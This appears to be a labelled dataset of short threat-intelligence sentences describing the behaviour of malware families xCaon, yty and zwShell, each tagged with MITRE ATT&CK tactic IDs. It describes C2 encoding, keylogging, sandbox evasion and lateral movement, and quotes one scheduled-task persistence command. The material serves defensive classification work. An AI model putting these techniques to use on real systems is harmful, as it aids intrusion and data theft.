xCaon has a command to download files to the victim's machine.,['TA0011:Command and Control']
xCaon has leveraged native OS function calls to retrieve victim's network adapter's information using GetAdapterInfo API.,['TA0002:Execution']
xCaon has checked for the existence of Kaspersky antivirus software on the system.,['TA0007:Discovery']
xCaon has used Base64 to encode its C2 traffic.,['TA0011:Command and Control']
xCaon has encrypted data sent to the C2 server using a XOR key.,['TA0011:Command and Control']
xCaon has used the GetAdaptersInfo API call to get the victim's MAC address.,['TA0007:Discovery']
xCaon has communicated with the C2 server by sending POST requests over HTTP.,['TA0011:Command and Control']
xCaon has a command to start an interactive shell.,['TA0002:Execution']
xCmd can be used to execute binaries on remote systems by creating and starting a service.,['TA0002:Execution']
yty communicates to the C2 server by retrieving a Google Doc.,['TA0011:Command and Control']
"yty contains junk code in its binary, likely to confuse malware analysts.",['TA0005:Defense Evasion']
"yty collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.",['TA0009:Collection']
yty gathers information on victim’s drives and has a plugin for document listing.,['TA0007:Discovery']
yty uses a keylogger plugin to gather keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
yty gets an output of running processes using the tasklist command.,['TA0007:Discovery']
yty uses the net view command for discovery.,['TA0007:Discovery']
yty establishes persistence by creating a scheduled task with the command SchTasks /Create /SC DAILY /TN BigData /TR “ + path_file + “/ST 09:30“.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
yty collects screenshots of the victim machine.,['TA0009:Collection']
yty packs a plugin with UPX.,['TA0005:Defense Evasion']
"yty has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"yty gathers the computer name, the serial number of the main disk volume, CPU information, Microsoft Windows version, and runs the command systeminfo.",['TA0007:Discovery']
yty runs ipconfig /all and collects the domain name.,['TA0007:Discovery']
yty collects the victim’s username.,['TA0007:Discovery']
zwShell has deleted itself after creating a service as well as deleted a temporary file when the system reboots.,['TA0005:Defense Evasion']
zwShell can browse the file system.,['TA0007:Discovery']
zwShell can modify the Registry.,['TA0005:Defense Evasion']
zwShell has used RDP for lateral movement.,['TA0008:Lateral Movement']
zwShell has been copied over network shares to move laterally.,['TA0008:Lateral Movement']
zwShell has used SchTasks for execution.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
zwShell can obtain the victim PC name and OS version.,['TA0007:Discovery']
zwShell can obtain the victim IP address.,['TA0007:Discovery']
zwShell can obtain the name of the logged-in user on the victim.,['TA0007:Discovery']
zwShell can launch command-line shells.,['TA0002:Execution']
zwShell has established persistence by adding itself as a new service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"